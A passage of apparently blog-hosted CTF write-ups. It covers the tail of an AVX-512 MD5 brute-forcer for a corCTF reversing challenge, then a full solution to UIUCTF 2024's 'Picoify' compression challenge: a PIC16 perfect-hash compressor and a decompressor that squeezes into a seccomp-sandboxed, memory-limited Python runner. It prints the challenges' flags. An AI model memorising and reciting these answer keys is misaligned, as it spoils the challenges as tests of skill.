        flag[0] = ALPHABET_S4[c0] + 1;
        flag[7] = ALPHABET_S4[c0] + 4;
        for (int c1 = 0; c1 < A; c1++) {
            flag[1] = flag[10] = ALPHABET[c1];
            for (int c2 = 0; c2 < A; c2++) {
                flag[2] = flag[4] = ALPHABET[c2];
                for (int c3 = 0; c3 < A; c3++) {
                    flag[3] = ALPHABET[c3];
                    for (int c4 = 0; c4 < A; c4++) {
                        flag[5] = ALPHABET[c4];
                        for (int c5 = 0; c5 < A; c5++) {
                            flag[6] = ALPHABET[c5];

                            uint32_t *flag_u32 = (uint32_t *)flag;
                            for (int i = 0; i < 16; i++) {
                                _x0[i] = flag_u32[0];
                                _x1[i] = flag_u32[1];
                                _x2[i] = flag_u32[2];
                            }

                            __m512i x0 = _mm512_load_si512(_x0);
                            __m512i x1 = _mm512_load_si512(_x1);
                            __m512i x2 = _mm512_load_si512(_x2);

                            md5_avx512(x0, x1, _mm512_or_si512(x2, Y0));
                            md5_avx512(x0, x1, _mm512_or_si512(x2, Y1));
                            md5_avx512(x0, x1, _mm512_or_si512(x2, Y2));
                            md5_avx512(x0, x1, _mm512_or_si512(x2, Y3));
                        }
                    }
                }
            }
        }
        printf("checkpoint: %d (thread %d)\n", c0, n);
    }
    return NULL;
}

int main() {
    pthread_t threads[NTHREADS];
    for (uint64_t i = 0; i < NTHREADS; i++)
        pthread_create(&threads[i], NULL, search, (void *)i);
    for (uint64_t i = 0; i < NTHREADS; i++)
        pthread_join(threads[i], NULL);
    return 0;
}

1hr 20mins later, it found the flag: corctf{cPv3v8VfWbP}. The full flag emerges when it is submitted to digestme:

$ ./digestme
Welcome!
Please enter the flag here:
corctf{cPv3v8VfWbP}
Nice!

Full flag: corctf{youtu.be/dQw4w9WgXcQ}

Final thoughts

Despite coming so close to solving it in the end, and the miss costing us 6th place, I enjoyed every part of the challenge, from converting the disassembly into bitwise operations and then 32-bit integer arithmetic, to realizing it was MD5 all along, and even writing the bruteforcer that I somehow messed up.

I do believe the challenge would have been better off with a smaller search space, because some people (like me) don’t have strong CPUs or GPUs. On the other hand, I think performance optimization is fun, especially when SIMD is involved.

[UIUCTF 2024] Picoify (500)

2024-07-01T00:00:00+00:00

Problem Description

Picoify is a “king-of-the-hill” style challenge in which we’re tasked with implementing a compression algorithm and corresponding decompressor under fairly severe restrictions. Better compression results in a better score.

Specifically, the task is to write a compression algorithm for the Microchip PIC16F628A, a small 8-bit microcontroller with 2048 words of program memory (i.e. space for 2048 instructions), and 224 bytes of RAM. The decompressor is written in Python, but is run in a strict seccomp sandbox with tight memory and CPU limits.

The input text is 2048 bytes long, drawn randomly from a list of 8192 uppercase words, with certain letters (ABEGIOSTZ) randomly replaced by 1337-speak equivalents (50% probability). Here’s an example input:

RE4LLY RUG C1TI35 633K R35P1RA7ORY GUARD COL0URS P4PER PRO7EC73D SQU4R3 C0M81NE P0RC3L41N L0 NI 7ASKS CER4MIC YO6A 7ERM1NA7I0N C0N50L3S 3F N0RT0N F1RM N3C HELP5 R1M UM 7R166ER MURPHY H3LP SENS0R EXTR4ORDINARY 5UPER M0R0CC0 B0T5WANA C0NN3C710N M3NT10N WO0D5 E4R AUTHEN71C 6OV3RNM3N74L CHRI5 S33KER LIN6ER1E PR0DUC71ON 3XPLORER F4C3 FLO0D DECAD3 AN4LYSES AV6 4GE5 4U5 P455AGE D 8R42IL14N 8RIN61N6 63OR614 TUR80 B3LG1UM CSS ARMED 0U7COM3 U5IN6 8UDDY AU7OM471ON R35ULT3D JACKET 6R CHR0NIC BESIDES L4ND M0V135 PREP4RE F15HIN6 N1CK SCH3ME ALPINE MUL7I 5UPPL3M[…]

The input is truncated to fit 2048 bytes, so the final word may be cut off.

The score of any submission is the number of bytes saved, and you need to compress by at least 25% to get a flag at all. Thus, the minimum score to get a flag is 512 (2048 * 1/4).

We’re provided with a starter PIC assembly file that just echoes the input back to the output, as well as a Dockerfile for running the scoring system locally.

Analysis

There are only 36 unique characters, so one very simple approach is to output 6 bits per character; this would be sufficient to score 512 and get a flag (output is 2048*6/8 = 1536 bytes exactly). We can get more clever using entropy encoding, using a variable number of bits per character; the Huffman algorithm is a common approach. We can use a quick script to calculate the average entropy of the texts and estimate the score of such an approach:

from collections import Counter
import math
c = Counter()
samples = []
for i in range(100):
    data = generate_data()
    samples.append(data)
    c.update(data)

total = len(samples) * 2048
entropy = sum((v / total) * -math.log2(v / total) for v in c.values())
print(entropy)

This produces an entropy of 4.67 bits per character, meaning that a Huffman-based approach should produce around 2048*4.67/8 ≈ 1196 bytes of output, for a score of around 852. From the challenge scoreboard provided by the organizers, it seems most successful teams took this approach.
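For readers who want to check how close a real Huffman code gets to the entropy estimate, here is a minimal sketch that computes Huffman code lengths with a heap. It is not what any team submitted; the function names are made up for illustration, and the sample string stands in for the challenge texts.

```python
import heapq
from collections import Counter


def huffman_code_lengths(freqs):
    """Return {symbol: code length in bits} for a frequency mapping.

    Note: a single-symbol input yields length 0, which a real encoder
    would need to special-case.
    """
    # Heap entries are (weight, tiebreak, {symbol: depth}); the integer
    # tiebreak ensures the dicts themselves are never compared.
    heap = [(w, i, {sym: 0}) for i, (sym, w) in enumerate(freqs.items())]
    heapq.heapify(heap)
    tiebreak = len(heap)
    while len(heap) > 1:
        w1, _, d1 = heapq.heappop(heap)
        w2, _, d2 = heapq.heappop(heap)
        # Merging two subtrees pushes every symbol in them one level deeper.
        merged = {s: depth + 1 for s, depth in {**d1, **d2}.items()}
        heapq.heappush(heap, (w1 + w2, tiebreak, merged))
        tiebreak += 1
    return heap[0][2]


def huffman_total_bits(text):
    """Total encoded size in bits for `text` under its own Huffman code."""
    freqs = Counter(text)
    lengths = huffman_code_lengths(freqs)
    return sum(freqs[s] * lengths[s] for s in freqs)


sample = "aaaabbcd"
print(huffman_code_lengths(Counter(sample)))
print(huffman_total_bits(sample), "bits")
```

Because Huffman codes use a whole number of bits per symbol, the result is never below the entropy bound, and a real submission would also need to ship or hard-code the code table.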

While I considered these approaches, I figured it should be possible to score much higher given the constrained nature of the input text: there are only 8192 words (13 bits of entropy per word), and a few bits of extra entropy per word to account for the random 1337-speak letters (1 bit of entropy per 1337-speakable letter). Running a quick simulation, if we’re able to actually encode each word using exactly 13 bits (plus 1337-speak bits), we could score an average of 1485 (average output size is 562.8 bytes):

import re, statistics
comp_bits = [len(t.split()) * 13 + len(re.findall(b"[ABEGIOSTZ483610572]", t)) for t in samples]
print(statistics.mean(comp_bits) / 8)

This sets a rough upper bound on the performance of any compression algorithm - it measures the amount of entropy used to generate the input text in the first place.

The Compressor

For encoding words using a minimum number of bits, we can use perfect hashing. A perfect hash function is one which maps every input in a finite set to a unique numerical value with no collisions. If we can find a perfect hash function for our wordlist, we could compress by outputting the hash values for each word; as there are no collisions, the decompressor could uniquely map these back to the original words.

Luckily, the GNU gperf command is designed specifically for this purpose. It is normally used to derive perfect hash functions for sets of keywords (e.g. for parsing a programming language). We can just feed gperf our entire wordlist: head -n 8192 words.txt | tr a-z A-Z | gperf -n -m=10 -k '1-11,$' -7 > gperf.c.

gperf outputs C code which implements the perfect hash function:

static unsigned int
hash (str, len)
     register const char *str;
     register unsigned int len;
{
  static unsigned int asso_values[] =
    {
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124,    145,  22134,  14665,   7025,     20,
       43498,   6070,   2551,     60,  13988,  38948,   1820,  30148,     15,     85,
        6351,   5350,     25,      5,     65,    555,  14565,   2027,    295,    735,
       45643,  29266,   7705,  42888,  10966,     21,   4875,    325,   4725,  53578,
       57958,  14261,   1220,  29394,  60128,  26679,  45243,    275,   2250,   1350,
       23954,    585,    430,     90,  35098,  11101,  49537,    401,  51258,      1,
       64213,  10636,   4410,   1945,  10338,   2786,  42248,  14110,   9063,  51277,
           5,   1385,    330, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124
    };
  register unsigned int hval = 0;

  switch (len)
    {
      default:
        hval += asso_values[(unsigned char)str[10]];
      /*FALLTHROUGH*/
      case 10:
        hval += asso_values[(unsigned char)str[9]];
      /*FALLTHROUGH*/
      case 9:
        hval += asso_values[(unsigned char)str[8]];
      /*FALLTHROUGH*/
      case 8:
        hval += asso_values[(unsigned char)str[7]];
      /*FALLTHROUGH*/
      case 7:
        hval += asso_values[(unsigned char)str[6]];
      /*FALLTHROUGH*/
      case 6:
        hval += asso_values[(unsigned char)str[5]+3];
      /*FALLTHROUGH*/
      case 5:
        hval += asso_values[(unsigned char)str[4]+19];
      /*FALLTHROUGH*/
      case 4:
        hval += asso_values[(unsigned char)str[3]+13];
      /*FALLTHROUGH*/
      case 3:
        hval += asso_values[(unsigned char)str[2]+29];
      /*FALLTHROUGH*/
      case 2:
        hval += asso_values[(unsigned char)str[1]];
      /*FALLTHROUGH*/
      case 1:
        hval += asso_values[(unsigned char)str[0]+42];
        break;
    }
  return hval + asso_values[(unsigned char)str[len - 1]];
}

Over our wordlist, the maximum hash value is 206123, which can be comfortably encoded in 18 bits (2¹⁸ = 262144). Simulating this, we find that this should compress to around 734 bytes per message on average, giving a score of 1314 - far better than the Huffman approach!
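To experiment with the hash outside of C, here is a Python port of the gperf function above. It uses the compressed form of the association table (indexed from `'A'`, i.e. character code minus 65) and the per-position offsets that appear later in this write-up; the function name `gperf_hash` is my own.

```python
# Association values for character codes 65..132 (unreachable entries removed).
ASSO = (
    145, 22134, 14665, 7025, 20, 43498, 6070, 2551, 60, 13988, 38948, 1820,
    30148, 15, 85, 6351, 5350, 25, 5, 65, 555, 14565, 2027, 295, 735, 45643,
    29266, 7705, 42888, 10966, 21, 4875, 325, 4725, 53578, 57958, 14261, 1220,
    29394, 60128, 26679, 45243, 275, 2250, 1350, 23954, 585, 430, 90, 35098,
    11101, 49537, 401, 51258, 1, 64213, 10636, 4410, 1945, 10338, 2786, 42248,
    14110, 9063, 51277, 5, 1385, 330,
)
# Offset added to the character code at each of the first 11 positions.
OFFS = (42, 0, 29, 13, 19, 3, 0, 0, 0, 0, 0)


def gperf_hash(word):
    """Hash an uppercase ASCII word the same way the generated C code does."""
    h = ASSO[ord(word[-1]) - 65]  # the final character is always included
    for i, ch in enumerate(word[:len(OFFS)]):
        h += ASSO[ord(ch) + OFFS[i] - 65]
    return h


for w in ("MS", "MN", "ME", "MR", "GS", "MI"):
    print(w, gperf_hash(w))
```

The six sample words are the smallest hash values listed in the decoder's word map later on, which makes them a convenient spot check.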

Instead of writing this in PIC assembly, I chose to use Microchip’s XC8 C compiler. I converted the provided startup code to C in order to get the UART to work. Since we’re working with a very small amount of memory, I chose the smallest possible data types to save space, making use of Microchip’s special uint24_t 3-byte integer type to save even more space.

The implementation itself is relatively straightforward: we accumulate the hash and “1337 bits” as each plaintext character comes in, then flush the hash and any accumulated 1337 bits when we see a space character. When we reach 2028 total input characters, we switch to encoding the remaining characters directly to avoid problems with any final truncated word (as the longest word in the wordlist is 18 characters).

Here’s what the PIC code looks like. This is compiled with xc8-cc -mcpu=pic16f628a -O2:

#include <xc.h>
#include <stdint.h>

// disable the watchdog timer
#pragma config WDTE = OFF

static uint8_t txbuf[8];
static uint8_t txcnt = 0;

static void send_byte(uint8_t b) {
    txbuf[txcnt] = b;
    txcnt++;
}

static uint16_t total_rx_count = 0;
static uint8_t is_tail = 0;

static uint8_t word_len = 0;
static uint8_t last_char = 0;
static uint24_t cur_hash = 0;
static uint24_t leet_bits = 0;
static uint8_t leet_count = 0;

// compressed form of the gperf table, removing unreachable entries
static const uint16_t asso_values[] = {145, 22134, 14665, 7025, 20, 43498, 6070, 2551, 60, 13988, 38948, 1820, 30148, 15, 85, 6351, 5350, 25, 5, 65, 555, 14565, 2027, 295, 735, 45643, 29266, 7705, 42888, 10966, 21, 4875, 325, 4725, 53578, 57958, 14261, 1220, 29394, 60128, 26679, 45243, 275, 2250, 1350, 23954, 585, 430, 90, 35098, 11101, 49537, 401, 51258, 1, 64213, 10636, 4410, 1945, 10338, 2786, 42248, 14110, 9063, 51277, 5, 1385, 330};
// offsets applied to each character to get the asso_values index
static const int8_t asso_offs[] = {-23, -65, -36, -52, -46, -62, -65, -65, -65, -65, -65};
// offset applied to the final character
#define asso_final_off (-65)
static const uint8_t leet_map[] = { 'O', 'I', 'Z', 'E', 'A', 'S', 'G', 'T', 'B' };

static uint8_t cur_byte = 0;
static uint8_t cur_bit = 0;

static void push_bits(uint24_t x, uint8_t nbits) {
    while(nbits) {
        uint8_t cur = nbits;
        if(cur > (8 - cur_bit)) {
            cur = 8 - cur_bit;
        }
        cur_byte |= ((uint8_t)x) << cur_bit;
        cur_bit += cur;
        nbits -= cur;
        x >>= cur;
        if(cur_bit == 8) {
            send_byte(cur_byte);
            cur_byte = 0;
            cur_bit = 0;
        }
    }
}

static void process_char(uint8_t c) {
    total_rx_count++;
    if(is_tail) {
        // this could be more efficient (e.g. 6 bit or entropy encoding)
        // but we're only using it for at most 20 input characters
        push_bits(c, 8);
        if(total_rx_count == 2048) {
            push_bits(0, 8);
        }
        return;
    }

    if(c == ' ') {
        if(total_rx_count >= 2028) {
            is_tail = 1;
        }
        cur_hash += asso_values[last_char + asso_final_off];
        push_bits(cur_hash, 18);
        if(leet_count)
            push_bits(leet_bits, leet_count);

        word_len = 0;
        last_char = 0;
        cur_hash = 0;
        leet_bits = 0;
        leet_count = 0;
        return;
    }

    /* regular word character */
    if(c >= '0' && c <= '8') {
        c = leet_map[c - '0'];
        leet_bits |= (1 << leet_count);
        leet_count++;
    } else if(c == 'A' || c == 'B' || c == 'E' || c == 'G' || c == 'I' || c == 'O' || c == 'S' || c == 'T' || c == 'Z') {
        leet_count++;
    }

    if(word_len <= 10) {
        cur_hash += asso_values[c + asso_offs[word_len]];
    }
    word_len++;
    last_char = c;
}

void __interrupt() main_irq() {
    if(PIR1bits.RCIF) {
        /* rx interrupt */
        uint8_t c = RCREG;
        PIR1bits.RCIF = 0;
        process_char(c);
    }
}

int main() {
    // globally enable interrupts
    INTCONbits.GIE = 1;
    INTCONbits.PEIE = 1;

    // configure uart and transmitter
    TRISB = 0x06;
    SPBRG = 32;
    TXSTAbits.SYNC = 0;
    RCSTAbits.SPEN = 1;
    TXSTAbits.TXEN = 1;

    // configure uart receiver
    PIE1bits.RCIE = 1;
    RCSTAbits.CREN = 1;

    while(1) {
        while(!TXSTAbits.TRMT)
            ;
        while(!txcnt)
            ;
        TXREG = txbuf[0];
        txcnt--;
        for(uint8_t i=0; i<txcnt; i++)
            txbuf[i] = txbuf[i+1];
    }
}

One feature to note is that we buffer and send bytes asynchronously, because we only send bytes upon receiving a space character and may output several bytes at once (up to 36 bits).
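The bit layout produced by push_bits (least-significant bit first, filling each output byte from bit 0 upward) can be modeled in a few lines of Python, which is handy for testing a decoder without the PIC toolchain. This is a sketch of my own, with hypothetical `BitWriter` and `BitReader` classes, and it assumes each value fits in the number of bits requested.

```python
class BitWriter:
    """Python model of the C push_bits routine (LSB-first packing)."""

    def __init__(self):
        self.out = bytearray()
        self.cur_byte = 0
        self.cur_bit = 0

    def push_bits(self, x, nbits):
        while nbits:
            cur = min(nbits, 8 - self.cur_bit)
            # Same effect as the uint8_t truncation in the C code.
            self.cur_byte |= ((x & 0xFF) << self.cur_bit) & 0xFF
            self.cur_bit += cur
            nbits -= cur
            x >>= cur
            if self.cur_bit == 8:
                self.out.append(self.cur_byte)
                self.cur_byte = 0
                self.cur_bit = 0


class BitReader:
    """Inverse operation: pull values back out in the same order."""

    def __init__(self, data):
        self.data = data
        self.cur_byte = 0
        self.cur_bit = 0

    def read_bits(self, n):
        res = 0
        got = 0
        while got < n:
            chunk = min(n - got, 8 - self.cur_bit)
            t = (self.data[self.cur_byte] >> self.cur_bit) & ((1 << chunk) - 1)
            res |= t << got
            got += chunk
            self.cur_bit += chunk
            if self.cur_bit == 8:
                self.cur_bit = 0
                self.cur_byte += 1
        return res


w = BitWriter()
w.push_bits(121, 18)    # an 18-bit word hash
w.push_bits(0b101, 3)   # three "1337 bits"
w.push_bits(0, 8)       # padding so the last partial byte gets flushed
r = BitReader(bytes(w.out))
print(w.out.hex(), r.read_bits(18), r.read_bits(3))
```

The trailing `push_bits(0, 8)` mirrors what the compressor does once the final input character arrives: without it, the last partially filled byte would never be sent.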

This is a very space-efficient compressor, using only 583 words of program memory (28.5%) and 51 bytes of RAM (22.8%). Here’s a sample compressed output corresponding to the sample input above (748 bytes); note that it’s a bit larger than predicted because we encode up to 21 bytes of trailing characters rather inefficiently:

3877984a12693cb20b2b77c7e762860280bc84ef44aafde858752c9dce39bcf0e4c86cdac74d2bb1468988d1118c63d550165e8755454caa104b7b8e6adb991d4f351549d3ac77f4136f6c9b6740bf11081d258a21e8e1e9280125fd5e107a631df314e0b723b8d29e9ee609fb4330c066542f71b70742ee2a38610a6d0521291c8282269d7cc878028eece218c883bc987b1bad6e3dccbec98b3df8527f03e0aa0626385607af26b3b0230adde31e7bf90d180128a94a5d550035fa4cf5e4c99b910b1a7b76da874ca41a05fa132943a7d7df507b9e31f3330a736380750302a597a3f8dcd22dbeeb331b8c80e590ff202e374c51d960bb020b2d9895037c08704f8068216c472f50888de8d384064640847124da1fb78aa83c41384a1ab168e7e220e1dea20032b1c0ed148d4050d1563c6e618dcb8c1fe4ec9bebfb7e484b93a4b5aaa50b643e58e1e1989c0092117dface8aa2913720d31f2bc944bc4da22882cf2de3b3c5e0bd1a968da0447900dfc1a1e11ea9787c13506072a312abee9546b50927af86101c99f81b2f22d8012dacba093281ade5d0e18ea16f52cbaa87a7423e116986995222993c91c927cf50a542e2f2c01d45977e90bd3548e10156bcf4d2b9a8f69a346227c58bdc0e878c98e75066a6e221cd9f3118b8d3f7369c8857a4b5c9d1cc41de79962495c579092c101432cf81991cd2a1c36169172a701844c242c7f9fc6d6cb153e4221249026db5e09da72ecf0417c911292a94910cae855da54a0a14cab2353eb7b90a242f464551806b44be1723379c244f9a683e6e440823c73be876a83e7f2d13e506c06e4b870243081217c1c128b4cf3452fcf52131371a914301de7fa329bfaa22b77def64523e3ae0012e0e4a772697c785d9a4d2166dcc04d95bdc9800f2ccc1732e5a9d31c39e80a622882bc0de58690e38ac9b2600b49891e724688c749484aaa6ff67d8e9c81097bdf4fb1ceb132f979476d6480cdbc3b07edd2501291772370a1e4e3c731f8d571972c9448992ac629c66409c9ea890629c8e00

The Decompressor

When I first devised this algorithm, I didn’t really think about the decompressor much; I figured it would be easy to implement since we get to write Python code. Little did I know this would end up being the hardest part of the challenge.

The decompression code is run using a small stub called decomp_runner.py, which looks like this:

#!/usr/bin/env python3

import sys
from base64 import b64decode
import resource
import pyseccomp


def run(prog, data, out):
    exec(prog, {'data': data, 'out': out})


def sandbox():
    resource.setrlimit(resource.RLIMIT_CPU, (1, 1))
    resource.setrlimit(resource.RLIMIT_FSIZE, (4096, 4096))
    resource.setrlimit(resource.RLIMIT_AS, (1 << 21, 1 << 21))
    resource.setrlimit(resource.RLIMIT_DATA, (1 << 21, 1 << 21))

    filter = pyseccomp.SyscallFilter(pyseccomp.ERRNO(pyseccomp.errno.EPERM))
    filter.add_rule(pyseccomp.ALLOW, 'write', pyseccomp.Arg(0, pyseccomp.EQ, sys.stdout.fileno()))
    filter.add_rule(pyseccomp.ALLOW, 'exit_group')
    filter.add_rule(pyseccomp.ALLOW, 'brk')
    filter.load()


def main():
    assert len(sys.argv) == 3

    prog = b64decode(sys.argv[1]).decode('ascii')
    data = b64decode(sys.argv[2])
    out = bytearray([0]*4096)

    sandbox()
    run(prog, data, out)


if __name__ == '__main__':
    main()

Our decompressor code is passed as a base64 blob on the command-line, together with the compressor’s output. It installs tight CPU and memory limits (1 second CPU time, 2 MB memory size), then loads a very restrictive seccomp syscall filter which allows only write(STDOUT_FILENO, ...), exit_group and brk. Finally, the provided code is launched with exec.

My first decoder attempt looked like this:

wordmap = {
11: "MS",
31: "MN",
41: "ME",
51: "MR",
100: "GS",
121: "MI",
# [snip] #
194085: "OLYMPIC",
195863: "NIGHTLIFE",
203640: "HOMEWORK",
205457: "NETWORK",
206123: "BRUNSWICK",
}

leet_table = {
    'A': '4',
    'B': '8',
    'E': '3',
    'G': '6',
    'I': '1',
    'O': '0',
    'S': '5',
    'T': '7',
    'Z': '2'
}

cur_byte = 0
cur_bit = 0

def readbits(n):
    global cur_bit, cur_byte
    res = 0
    resbits = 0
    while resbits < n:
        chunk = n - resbits
        if chunk > 8 - cur_bit:
            chunk = 8 - cur_bit
        t = (data[cur_byte] >> cur_bit) & ((1 << chunk) - 1)
        res |= t << resbits
        resbits += chunk
        cur_bit += chunk
        if cur_bit == 8:
            cur_bit = 0
            cur_byte += 1
    return res

output = ""
while len(output) < 2028:
    word = wordmap[readbits(18)]
    for c in word:
        if c in leet_table:
            is_leet = readbits(1)
            if is_leet:
                output += leet_table[c]
            else:
                output += c
        else:
            output += c
    output += " "

while len(output) < 2048:
    output += chr(readbits(8))

sys.stdout.write(output)
sys.stdout.flush()

This worked great in preliminary testing, but failed entirely when run on the actual scoring system. The script was being passed as a base64 blob on the command line and was exceeding the maximum length of a single command-line argument. Some experimentation showed that the default maximum length was 128KB (131072 bytes) for a single argument, which translates into 96KB before base64 encoding. Thankfully, our raw wordlist is around 60KB, so my next attempt looked something like this:

wordlist = """
THE
OF
AND
TO
A
[...]
CYLINDER
WITCH
BUCK
INDICATION
EH
""".split()

def perfect_hash(w):
  [...]
wordmap = {perfect_hash(w): w for w in wordlist}

[...]

This runs, but immediately crashes before executing any code. Some debugging with strace revealed that Python was attempting to use the sbrk system call to allocate memory to compile the program (in particular, allocating space for the wordlist constant). Unfortunately, only the brk system call has been permitted through the filter, so Python’s attempt to allocate memory fails and it throws a MemoryError while compiling the code for exec.

This is much more serious than it initially appears. Without the ability to sbrk for additional memory, we’re effectively limited to only the free memory that was available before the seccomp filter was installed - and that small amount of memory has to be enough for both the compiled program and all of the variables it creates as it runs. Some experimentation suggests that we have around 120KB of free memory. Keep in mind that Python objects are quite heavyweight: per .__sizeof__(), a simple integer is 28 bytes in size, while a single-character string is 50 bytes, and both sizes are likely underestimates due to padding and malloc metadata. I also did not immediately see a way to convince Python to use brk instead of sbrk using pure Python code.
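To get a feel for how quickly Python objects eat into a budget like this, the following sketch measures a few object sizes with `sys.getsizeof`. The exact numbers depend on the CPython version and platform, and `fake_words` is a hypothetical stand-in for the real wordlist (8192 distinct 8-character strings).

```python
import sys

int_size = sys.getsizeof(1)
str_size = sys.getsizeof("A")

# Hypothetical stand-in for the wordlist: 8192 distinct 8-character strings.
fake_words = ["W%07d" % i for i in range(8192)]

# The list itself stores one pointer per element, on top of the string objects.
total = sys.getsizeof(fake_words) + sum(sys.getsizeof(w) for w in fake_words)

print("int:", int_size, "bytes")
print("1-char str:", str_size, "bytes")
print("8192 short strings in a list:", total // 1024, "KB")
```

Even before counting allocator overhead, a materialized list of this size is several times larger than the free memory estimated above.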

To get around this problem, I chose to smuggle the wordlist in a comment, which would not be compiled and would therefore not incur a significant memory cost. We can access the source code of our program, and thus the embedded wordlist, by walking the stack:

#THE,OF,AND,[...],BUCK,INDICATION,EH
try:
    1/0
except Exception as e:
    prog = e.__traceback__.tb_frame.f_back.f_locals["prog"]
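The stack-walking trick can be tried outside the sandbox with a tiny stand-in runner. In this sketch, `run` imitates the challenge stub by keeping the source in a local variable named `prog`; the three-word comment line and the `out` list are made up for illustration.

```python
def run(prog, out):
    # Like the real runner, the source string lives in a local named "prog".
    exec(prog, {"out": out})


PROGRAM = "\n".join([
    "#ALPHA,BETA,GAMMA",
    "try:",
    "    1/0",
    "except Exception as e:",
    # tb_frame is the frame of this exec'd code; f_back is run()'s frame.
    "    src = e.__traceback__.tb_frame.f_back.f_locals['prog']",
    # Slice out the first line without the leading '#'.
    "out.append(src[1:src.index(chr(10))])",
])

captured = []
run(PROGRAM, captured)
print(captured[0])
```

The comment line never becomes a compiled constant, so the only copy of the embedded data is the source string the runner already holds.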

However, we can’t even do something like wordlist = prog.split("\n")[0].split(",") due to the severe memory restrictions - 8192 strings will occupy at least 400KB (per __sizeof__()), far more than the 100KB we have available.

Instead, I took the approach of dynamically searching the wordlist for each incoming word. To avoid an expensive linear search (which would blow our CPU limit - 1 second), I sorted the wordlist by hash value, then implemented a binary search:

#,MS,MN,ME,MR,GS,MI,[...],OLYMPIC,NIGHTLIFE,HOMEWORK,NETWORK,BRUNSWICK,

try:
    1/0
except Exception as e:
    prog = e.__traceback__.tb_frame.f_back.f_locals["prog"]

table = (145,22134,14665,7025,20,43498,6070,2551,60,13988,38948,1820,30148,15,85,6351,5350,25,5,65,555,14565,2027,295,735,45643,29266,7705,42888,10966,21,4875,325,4725,53578,57958,14261,1220,29394,60128,26679,45243,275,2250,1350,23954,585,430,90,35098,11101,49537,401,51258,1,64213,10636,4410,1945,10338,2786,42248,14110,9063,51277,5,1385,330)
offs = (42,0,29,13,19,3,0,0,0,0,0)
def lookup(th):
    lo = 2
    hi = 61828
    while lo < hi:
        mid = (lo + hi) // 2
        a = prog.rfind(",", 0, mid)+1
        b = prog.find(",", mid)
        h = table[ord(prog[b-1]) - 65]
        for i in range(b-a):
            if i < len(offs):
                h += table[ord(prog[a+i]) + offs[i] - 65]
        if h < th:
            lo = mid + 1
        else:
            hi = mid
    return lo
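The search above works on character positions rather than list indices, which is what lets it run without ever splitting the string. Here is a self-contained sketch of the same idea on a small blob. To keep it short it uses a stand-in `toy_hash` (the word's bytes read as a big-endian integer, which is unique per word) instead of the gperf hash, and it slices the word out for clarity where the original indexes characters in place to avoid allocations.

```python
def toy_hash(word):
    # Stand-in for the perfect hash: distinct words give distinct integers.
    return int.from_bytes(word.encode("ascii"), "big")


WORDS = ["NETWORK", "HOMEWORK", "OLYMPIC", "NIGHTLIFE", "BRUNSWICK", "MS", "GS"]

# Same layout as the comment line: '#', then comma-delimited words sorted by hash.
BLOB = "#," + ",".join(sorted(WORDS, key=toy_hash)) + ","


def lookup(blob, target):
    """Return the start position of the word whose hash equals `target`."""
    lo, hi = 2, len(blob) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        # Expand mid to the boundaries of the word that contains it. A
        # position sitting on a comma is treated as part of the word before it.
        a = blob.rfind(",", 0, mid) + 1
        b = blob.find(",", mid)
        if toy_hash(blob[a:b]) < target:
            lo = mid + 1
        else:
            hi = mid
    return lo


def word_at(blob, pos):
    return blob[pos:blob.index(",", pos)]


for w in WORDS:
    print(w, "->", word_at(BLOB, lookup(BLOB, toy_hash(w))))
```

Since every position inside or just after a word maps to that word's hash, the predicate "hash < target" is monotone over positions, and the search converges on the first character of the matching word.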

One final trick I used was to get a tiny bit more memory by clearing sys.argv, thereby freeing the large base64-encoded version of the program and buying around 100KB of extra memory to work with. I needed to do this because compiling the program itself still required more memory than was available:

import sys
sys.argv[:] = []

exec(r"""
[rest of the program]
""")

Putting this all together produces the final decompressor:

#,MS,MN,ME,MR,GS,MI,[...],OLYMPIC,NIGHTLIFE,HOMEWORK,NETWORK,BRUNSWICK,
import sys
# get ourselves just a little more memory to work with
sys.argv[:] = []

try:
    1/0
except Exception as e:
    prog = e.__traceback__.tb_frame.f_back.f_locals["prog"]

exec(r"""
table = (145,22134,14665,7025,20,43498,6070,2551,60,13988,38948,1820,30148,15,85,6351,5350,25,5,65,555,14565,2027,295,735,45643,29266,7705,42888,10966,21,4875,325,4725,53578,57958,14261,1220,29394,60128,26679,45243,275,2250,1350,23954,585,430,90,35098,11101,49537,401,51258,1,64213,10636,4410,1945,10338,2786,42248,14110,9063,51277,5,1385,330)
offs = (42,0,29,13,19,3,0,0,0,0,0)
def lookup(th):
    lo = 2
    hi = 61828
    while lo < hi:
        mid = (lo + hi) // 2
        a = prog.rfind(",", 0, mid)+1
        b = prog.find(",", mid)
        h = table[ord(prog[b-1]) - 65]
        for i in range(b-a):
            if i < len(offs):
                h += table[ord(prog[a+i]) + offs[i] - 65]
        if h < th:
            lo = mid + 1
        else:
            hi = mid
    return lo

leet_table = {
    'A': '4',
    'B': '8',
    'E': '3',
    'G': '6',
    'I': '1',
    'O': '0',
    'S': '5',
    'T': '7',
    'Z': '2'
}

cur_byte = 0
cur_bit = 0

def read_bits(n):
    global cur_bit, cur_byte
    res = 0
    resbits = 0
    while resbits < n:
        chunk = min(n - resbits, 8 - cur_bit)
        t = (data[cur_byte] >> cur_bit) & ((1 << chunk) - 1)
        res |= t << resbits
        resbits += chunk
        cur_bit += chunk
        if cur_bit == 8:
            cur_bit = 0
            cur_byte += 1
    return res

p = 0
while p < 2028:
    t = lookup(read_bits(18))
    while prog[t] != ",":
        c = prog[t]
        if c in leet_table and read_bits(1):
            sys.stdout.write(str(leet_table[c]))
        else:
            sys.stdout.write(c)
        t += 1
        p += 1
    sys.stdout.write(" ")
    sys.stdout.flush()
    p += 1

while p < 2048:
    print(chr(read_bits(8)), end="")
    p += 1

sys.stdout.flush()
exit(0)
""")

Conclusion

This compressor is able to encode 2048 bytes of data in around 740 bytes on average (around 1308 points), more than sufficient to top the leaderboard. Running it several times produces different results, with the best result out of several runs being 1320 points (flag: 941379cb175c2e078e9d65606fc4ef3048468e0a4d45c717094dd268c0cafb60.1320).

